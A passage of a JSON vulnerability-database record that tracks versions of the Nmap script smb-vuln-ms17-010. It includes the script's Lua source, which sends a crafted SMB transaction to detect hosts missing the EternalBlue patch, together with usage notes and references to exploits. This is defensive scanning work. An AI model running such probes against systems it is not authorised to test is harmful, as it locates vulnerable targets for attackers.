"https://nmap.org/nsedoc/scripts/smb-vuln-ms17-010.html", "id": "NMAP:SMB-VULN-MS17-010.NSE", "lastseen": "2017-08-24T15:17:03", "modified": "2017-06-27T18:30:33", "nmap": {"categories": ["safe", "vuln"], "scriptType": "hostrule"}, "objectVersion": "1.3", "published": "2017-05-27T07:57:34", "references": [], "reporter": "Paulino Calderon <paulino()calderonpale.com>", "sourceData": "local nmap = require \"nmap\"\nlocal smb = require \"smb\"\nlocal vulns = require \"vulns\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\n\ndescription = [[\nAttempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code\n execution vulnerability (ms17-010, a.k.a. EternalBlue).\n The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware.\n\nThe script connects to the $IPC tree, executes a transaction on FID 0 and\n checks if the error \"STATUS_INSUFF_SERVER_RESOURCES\" is returned to\n determine if the target is not patched against ms17-010. Additionally it checks\n for known error codes returned by patched systems.\n\nTested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016.\n\nReferences:\n* https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n* https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n* https://msdn.microsoft.com/en-us/library/ee441489.aspx\n* https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb\n* https://github.com/cldrn/nmap-nse-scripts/wiki/Notes-about-smb-vuln-ms17-010\n]]\n\n---\n-- @usage nmap -p445 --script smb-vuln-ms17-010 <target>\n-- @usage nmap -p445 --script vuln <target>\n--\n-- @see smb-double-pulsar-backdoor.nse\n--\n-- @output\n-- Host script results:\n-- | smb-vuln-ms17-010:\n-- | VULNERABLE:\n-- | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\n-- | State: VULNERABLE\n-- | IDs: CVE:CVE-2017-0143\n-- | Risk factor: HIGH\n-- | A critical remote code execution vulnerability exists in Microsoft SMBv1\n-- | servers (ms17-010).\n-- |\n-- | Disclosure date: 2017-03-14\n-- | References:\n-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143\n-- | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n-- |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n--\n-- @xmloutput\n-- <table key=\"CVE-2017-0143\">\n-- <elem key=\"title\">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>\n-- <elem key=\"state\">VULNERABLE</elem>\n-- <table key=\"ids\">\n-- <elem>CVE:CVE-2017-0143</elem>\n-- </table>\n-- <table key=\"description\">\n-- <elem>A critical remote code execution vulnerability exists in Microsoft SMBv1&#xa; servers (ms17-010).&#xa;</elem>\n-- </table>\n-- <table key=\"dates\">\n-- <table key=\"disclosure\">\n-- <elem key=\"month\">03</elem>\n-- <elem key=\"year\">2017</elem>\n-- <elem key=\"day\">14</elem>\n-- </table>\n-- </table>\n-- <elem key=\"disclosure\">2017-03-14</elem>\n-- <table key=\"refs\">\n-- <elem>https://technet.microsoft.com/en-us/library/security/ms17-010.aspx</elem>\n-- <elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143</elem>\n-- <elem>https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/</elem>\n-- </table>\n-- </table>\n--\n-- @args smb-vuln-ms17-010.sharename Share name to connect. Default: IPC$\n---\n\nauthor = \"Paulino Calderon <paulino()calderonpale.com>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\", \"safe\"}\n\nhostrule = function(host)\n return smb.get_port(host) ~= nil\nend\n\nlocal function check_ms17010(host, port, sharename)\n local status, smbstate = smb.start_ex(host, true, true, \"\\\\\\\\\".. host.ip .. \"\\\\\" .. sharename, nil, nil, nil)\n if not status then\n stdnse.debug1(\"Could not connect to '%s'\", sharename)\n return false, string.format(\"Could not connect to '%s'\", sharename)\n else\n local overrides = {}\n local smb_header, smb_params, smb_cmd\n\n stdnse.debug1(\"Connected to share '%s'\", sharename)\n\n overrides['parameters_length'] = 0x10\n\n --SMB_COM_TRANSACTION opcode is 0x25\n smb_header = smb.smb_encode_header(smbstate, 0x25, overrides)\n smb_params = string.pack(\">I2 I2 I2 I2 B B I2 I4 I2 I2 I2 I2 I2 B B I2 I2 I2 I2 I2 I2\",\n 0x0, -- Total Parameter count (2 bytes)\n 0x0, -- Total Data count (2 bytes)\n 0xFFFF, -- Max Parameter count (2 bytes)\n 0xFFFF, -- Max Data count (2 bytes)\n 0x0, -- Max setup Count (1 byte)\n 0x0, -- Reserved (1 byte)\n 0x0, -- Flags (2 bytes)\n 0x0, -- Timeout (4 bytes)\n 0x0, -- Reserved (2 bytes)\n 0x0, -- ParameterCount (2 bytes)\n 0x4a00, -- ParameterOffset (2 bytes)\n 0x0, -- DataCount (2 bytes)\n 0x4a00, -- DataOffset (2 bytes)\n 0x02, -- SetupCount (1 byte)\n 0x0, -- Reserved (1 byte)\n 0x2300, -- PeekNamedPipe opcode\n 0x0, --\n 0x0700, -- BCC (Length of \"\\PIPE\\\")\n 0x5c50, -- \\P\n 0x4950, -- IP\n 0x455c -- E\\\n )\n stdnse.debug2(\"SMB: Sending SMB_COM_TRANSACTION\")\n local result, err = smb.smb_send(smbstate, smb_header, smb_params, '', overrides)\n if(result == false) then\n stdnse.debug1(\"There was an error in the SMB_COM_TRANSACTION request\")\n return false, err\n end\n\n local result, smb_header, _, _ = smb.smb_read(smbstate)\n local _ , smb_cmd, err = string.unpack(\"<c4 B I4\", smb_header)\n if smb_cmd == 37 then -- SMB command for Trans is 0x25\n stdnse.debug1(\"Valid SMB_COM_TRANSACTION response received\")\n\n --STATUS_INSUFF_SERVER_RESOURCES indicate that the machine is not patched\n if err == 0xc0000205 then\n stdnse.debug1(\"STATUS_INSUFF_SERVER_RESOURCES response received\")\n return true\n elseif err == 0xc0000022 then\n stdnse.debug1(\"STATUS_ACCESS_DENIED response received. This system is likely patched.\")\n return false, \"This system is patched.\"\n elseif err == 0xc0000008 then\n stdnse.debug1(\"STATUS_INVALID_HANDLE response received. This system is likely patched.\")\n return false, \"This system is patched.\"\n end\n stdnse.debug1(\"Error code received:%s\", stdnse.tohex(err))\n else\n stdnse.debug1(\"Received invalid command id.\")\n return false, string.format(\"Unexpected SMB response:%s\", stdnse.tohex(err))\n end\n end\nend\n\naction = function(host,port)\n local vuln_status, err\n local vuln = {\n title = \"Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\",\n IDS = {CVE = 'CVE-2017-0143'},\n risk_factor = \"HIGH\",\n description = [[\nA critical remote code execution vulnerability exists in Microsoft SMBv1\n servers (ms17-010).\n ]],\n references = {\n 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx',\n 'https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/'\n },\n dates = {\n disclosure = {year = '2017', month = '03', day = '14'},\n }\n }\n local sharename = stdnse.get_script_args(SCRIPT_NAME .. \".sharename\") or \"IPC$\"\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n vuln.state = vulns.STATE.NOT_VULN\n\n vuln_status, err = check_ms17010(host, port, sharename)\n if vuln_status then\n stdnse.debug1(\"This host is missing the patch for ms17-010!\")\n vuln.state = vulns.STATE.VULN\n else\n if nmap.verbosity() >=2 then\n return err\n end\n end\n return report:make_output(vuln)\nend\n", "title": "smb-vuln-ms17-010 NSE Script", "type": "nmap", "viewCount": 652}, "differentElements": ["modified", "sourceData"], "edition": 5, "lastseen": "2017-08-24T15:17:03"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability (ms17-010, a.k.a. EternalBlue). The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware. \n\nThe script connects to the $IPC tree, executes a transaction on FID 0 and checks if the error \"STATUS_INSUFF_SERVER_RESOURCES\" is returned to determine if the target is not patched against ms17-010. Additionally it checks for known error codes returned by patched systems. \n\nTested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016. \n\nReferences: \n\n * https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n * https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n * https://msdn.microsoft.com/en-us/library/ee441489.aspx\n * https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb\n * https://github.com/cldrn/nmap-nse-scripts/wiki/Notes-about-smb-vuln-ms17-010\n\n### See also:\n\n * smb-double-pulsar-backdoor.nse \n\n## Script Arguments \n\n#### smb-vuln-ms17-010.sharename \n\nShare name to connect. Default: IPC$\n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n\n * nmap -p445 --script smb-vuln-ms17-010 <target>\n\n * nmap -p445 --script vuln <target>\n \n\n## Script Output \n \n \n Host script results:\n | smb-vuln-ms17-010:\n | VULNERABLE:\n | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\n | State: VULNERABLE\n | IDs: CVE:CVE-2017-0143\n | Risk factor: HIGH\n | A critical remote code execution vulnerability exists in Microsoft SMBv1\n | servers (ms17-010).\n |\n | Disclosure date: 2017-03-14\n | References:\n | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143\n | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n \n\n## Requires \n\n * nmap\n * smb\n * vulns\n * stdnse\n * string\n\n* * *\n", "edition": 6, "enchantments": {"dependencies": {"modified": "2018-06-30T16:19:11", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/LINUX/HTTP/ALIENVAULT_EXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["CVE-2017-0143"], "type": "cve"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}]}, "score": {"value": 7.2, "vector": "NONE"}}, "hash": "8a1a1baa07b4b60daf277304ce6a9b559c26ccd9ddd9a08bd3a423c355b47b57", "hashmap": [{"hash": "4bf5c8ffb3442a2104d4824ac7f705a8", "key": "reporter"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "9f8fb1e7d3bcd40e4dc80b0759608ca5", "key": "nmap"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5e9a31f584635b52c9b5b992d7c89f09", "key": "modified"}, {"hash": "dad749029ff9320d6c901dd9054638ab", "key": "href"}, {"hash": "b6f2808e36c38d0e1749fe7cd6221774", "key": "published"}, {"hash": "3c468ec0659e4b43fe35808e6652bd9f", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "7c0132070a0ef71d542663e9dc1f5dee", "key": "type"}, {"hash": "4c6abb610ef2444ff085206adb66b74b", "key": "sourceData"}, {"hash": "fd4a2d6b539b2b10358da6b71e7b6e46", "key": "description"}], "history": [], "href": "https://nmap.org/nsedoc/scripts/smb-vuln-ms17-010.html", "id": "NMAP:SMB-VULN-MS17-010.NSE", "lastseen": "2018-06-30T16:19:11", "modified": "2018-06-28T13:40:30", "nmap": {"categories": ["safe", "vuln"], "scriptType": "hostrule"}, "objectVersion": "1.3", "published": "2017-05-27T07:57:34", "references": [], "reporter": "Paulino Calderon <paulino()calderonpale.com>", "sourceData": "local nmap = require \"nmap\"\nlocal smb = require \"smb\"\nlocal vulns = require \"vulns\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\n\ndescription = [[\nAttempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code\n execution vulnerability (ms17-010, a.k.a. EternalBlue).\n The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware.\n\nThe script connects to the $IPC tree, executes a transaction on FID 0 and\n checks if the error \"STATUS_INSUFF_SERVER_RESOURCES\" is returned to\n determine if the target is not patched against ms17-010. Additionally it checks\n for known error codes returned by patched systems.\n\nTested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016.\n\nReferences:\n* https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n* https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n* https://msdn.microsoft.com/en-us/library/ee441489.aspx\n* https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb\n* https://github.com/cldrn/nmap-nse-scripts/wiki/Notes-about-smb-vuln-ms17-010\n]]\n\n---\n-- @usage nmap -p445 --script smb-vuln-ms17-010 <target>\n-- @usage nmap -p445 --script vuln <target>\n--\n-- @see smb-double-pulsar-backdoor.nse\n--\n-- @output\n-- Host script results:\n-- | smb-vuln-ms17-010:\n-- | VULNERABLE:\n-- | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\n-- | State: VULNERABLE\n-- | IDs: CVE:CVE-2017-0143\n-- | Risk factor: HIGH\n-- | A critical remote code execution vulnerability exists in Microsoft SMBv1\n-- | servers (ms17-010).\n-- |\n-- | Disclosure date: 2017-03-14\n-- | References:\n-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143\n-- | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n-- |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n--\n-- @xmloutput\n-- <table key=\"CVE-2017-0143\">\n-- <elem key=\"title\">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>\n-- <elem key=\"state\">VULNERABLE</elem>\n-- <table key=\"ids\">\n-- <elem>CVE:CVE-2017-0143</elem>\n-- </table>\n-- <table key=\"description\">\n-- <elem>A critical remote code execution vulnerability exists in Microsoft SMBv1&#xa; servers (ms17-010).&#xa;</elem>\n-- </table>\n-- <table key=\"dates\">\n-- <table key=\"disclosure\">\n-- <elem key=\"month\">03</elem>\n-- <elem key=\"year\">2017</elem>\n-- <elem key=\"day\">14</elem>\n-- </table>\n-- </table>\n-- <elem key=\"disclosure\">2017-03-14</elem>\n-- <table key=\"refs\">\n-- <elem>https://technet.microsoft.com/en-us/library/security/ms17-010.aspx</elem>\n-- <elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143</elem>\n-- <elem>https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/</elem>\n-- </table>\n-- </table>\n--\n-- @args smb-vuln-ms17-010.sharename Share name to connect. Default: IPC$\n---\n\nauthor = \"Paulino Calderon <paulino()calderonpale.com>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\", \"safe\"}\n\nhostrule = function(host)\n return smb.get_port(host) ~= nil\nend\n\nlocal function check_ms17010(host, port, sharename)\n local status, smbstate = smb.start_ex(host, true, true, \"\\\\\\\\\".. host.ip .. \"\\\\\" .. sharename, nil, nil, nil)\n if not status then\n stdnse.debug1(\"Could not connect to '%s'\", sharename)\n return false, string.format(\"Could not connect to '%s'\", sharename)\n else\n local overrides = {}\n local smb_header, smb_params, smb_cmd\n\n stdnse.debug1(\"Connected to share '%s'\", sharename)\n\n overrides['parameters_length'] = 0x10\n\n --SMB_COM_TRANSACTION opcode is 0x25\n smb_header = smb.smb_encode_header(smbstate, 0x25, overrides)\n smb_params = string.pack(\">I2 I2 I2 I2 B B I2 I4 I2 I2 I2 I2 I2 B B I2 I2 I2 I2 I2 I2\",\n 0x0, -- Total Parameter count (2 bytes)\n 0x0, -- Total Data count (2 bytes)\n 0xFFFF, -- Max Parameter count (2 bytes)\n 0xFFFF, -- Max Data count (2 bytes)\n 0x0, -- Max setup Count (1 byte)\n 0x0, -- Reserved (1 byte)\n 0x0, -- Flags (2 bytes)\n 0x0, -- Timeout (4 bytes)\n 0x0, -- Reserved (2 bytes)\n 0x0, -- ParameterCount (2 bytes)\n 0x4a00, -- ParameterOffset (2 bytes)\n 0x0, -- DataCount (2 bytes)\n 0x4a00, -- DataOffset (2 bytes)\n 0x02, -- SetupCount (1 byte)\n 0x0, -- Reserved (1 byte)\n 0x2300, -- PeekNamedPipe opcode\n 0x0, --\n 0x0700, -- BCC (Length of \"\\PIPE\\\")\n 0x5c50, -- \\P\n 0x4950, -- IP\n 0x455c -- E\\\n )\n stdnse.debug2(\"SMB: Sending SMB_COM_TRANSACTION\")\n local result, err = smb.smb_send(smbstate, smb_header, smb_params, '', overrides)\n if(result == false) then\n stdnse.debug1(\"There was an error in the SMB_COM_TRANSACTION request\")\n return false, err\n end\n\n local result, smb_header, _, _ = smb.smb_read(smbstate)\n if not result then\n stdnse.debug1(\"Error reading SMB response: %s\", smb_header)\n -- error can happen if an (H)IPS resets the connection\n return false, smb_header\n end\n\n local _ , smb_cmd, err = string.unpack(\"<c4 B I4\", smb_header)\n if smb_cmd == 37 then -- SMB command for Trans is 0x25\n stdnse.debug1(\"Valid SMB_COM_TRANSACTION response received\")\n\n --STATUS_INSUFF_SERVER_RESOURCES indicate that the machine is not patched\n if err == 0xc0000205 then\n stdnse.debug1(\"STATUS_INSUFF_SERVER_RESOURCES response received\")\n return true\n elseif err == 0xc0000022 then\n stdnse.debug1(\"STATUS_ACCESS_DENIED response received. This system is likely patched.\")\n return false, \"This system is patched.\"\n elseif err == 0xc0000008 then\n stdnse.debug1(\"STATUS_INVALID_HANDLE response received. This system is likely patched.\")\n return false, \"This system is patched.\"\n end\n stdnse.debug1(\"Error code received:%s\", stdnse.tohex(err))\n else\n stdnse.debug1(\"Received invalid command id.\")\n return false, string.format(\"Unexpected SMB response:%s\", stdnse.tohex(err))\n end\n end\nend\n\naction = function(host,port)\n local vuln_status, err\n local vuln = {\n title = \"Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\",\n IDS = {CVE = 'CVE-2017-0143'},\n risk_factor = \"HIGH\",\n description = [[\nA critical remote code execution vulnerability exists in Microsoft SMBv1\n servers (ms17-010).\n ]],\n references = {\n 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx',\n 'https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/'\n },\n dates = {\n disclosure = {year = '2017', month = '03', day = '14'},\n }\n }\n local sharename = stdnse.get_script_args(SCRIPT_NAME .. \".sharename\") or \"IPC$\"\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n vuln.state = vulns.STATE.NOT_VULN\n\n vuln_status, err = check_ms17010(host, port, sharename)\n if vuln_status then\n stdnse.debug1(\"This host is missing the patch for ms17-010!\")\n vuln.state = vulns.STATE.VULN\n else\n vuln.state = vulns.STATE.NOT_VULN\n vuln.check_results = err\n end\n return report:make_output(vuln)\nend\n", "title": "smb-vuln-ms17-010 NSE Script", "type": "nmap", "viewCount": 1035}, "differentElements": ["cvss"], "edition": 6, "lastseen": "2018-06-30T16:19:11"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "Attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability (ms17-010, a.k.a. EternalBlue). The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware. \n\nThe script connects to the $IPC tree, executes a transaction on FID 0 and checks if the error \"STATUS_INSUFF_SERVER_RESOURCES\" is returned to determine if the target is not patched against ms17-010. Additionally it checks for known error codes returned by patched systems. \n\nTested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016. \n\nReferences: \n\n * https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n * https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n * https://msdn.microsoft.com/en-us/library/ee441489.aspx\n * https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb\n * https://github.com/cldrn/nmap-nse-scripts/wiki/Notes-about-smb-vuln-ms17-010\n\n### See also:\n\n * smb-double-pulsar-backdoor.nse \n\n## Script Arguments \n\n#### smb-vuln-ms17-010.sharename \n\nShare name to connect. Default: IPC$\n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n\n * nmap -p445 --script smb-vuln-ms17-010 <target>\n\n * nmap -p445 --script vuln <target>\n \n\n## Script Output \n \n \n Host script results:\n | smb-vuln-ms17-010:\n | VULNERABLE:\n | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\n | State: VULNERABLE\n | IDs: CVE:CVE-2017-0143\n | Risk factor: HIGH\n | A critical remote code execution vulnerability exists in Microsoft SMBv1\n | servers (ms17-010).\n |\n | Disclosure date: 2017-03-14\n | References:\n | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143\n | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n \n\n## Requires \n\n * nmap\n * smb\n * vulns\n * stdnse\n * string\n\n* * *\n", "edition": 7, "enchantments": {"dependencies": {"modified": "2019-05-30T17:05:19", "references": [{"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["CVE-2017-0143"], "type": "cve"}, {"idList": ["MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"], "type": "nessus"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2019-05-30T17:05:19", "rev": 2, "value": 8.3, "vector": "NONE"}}, "hash": "26ab0cabe8530ab83ef6b4efbd2570b3e2d919b479355a696ec1e3e1725465fc", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "4bf5c8ffb3442a2104d4824ac7f705a8", "key": "reporter"}, {"hash": "9f8fb1e7d3bcd40e4dc80b0759608ca5", "key": "nmap"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5e9a31f584635b52c9b5b992d7c89f09", "key": "modified"}, {"hash": "dad749029ff9320d6c901dd9054638ab", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "b6f2808e36c38d0e1749fe7cd6221774", "key": "published"}, {"hash": "3c468ec0659e4b43fe35808e6652bd9f", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "7c0132070a0ef71d542663e9dc1f5dee", 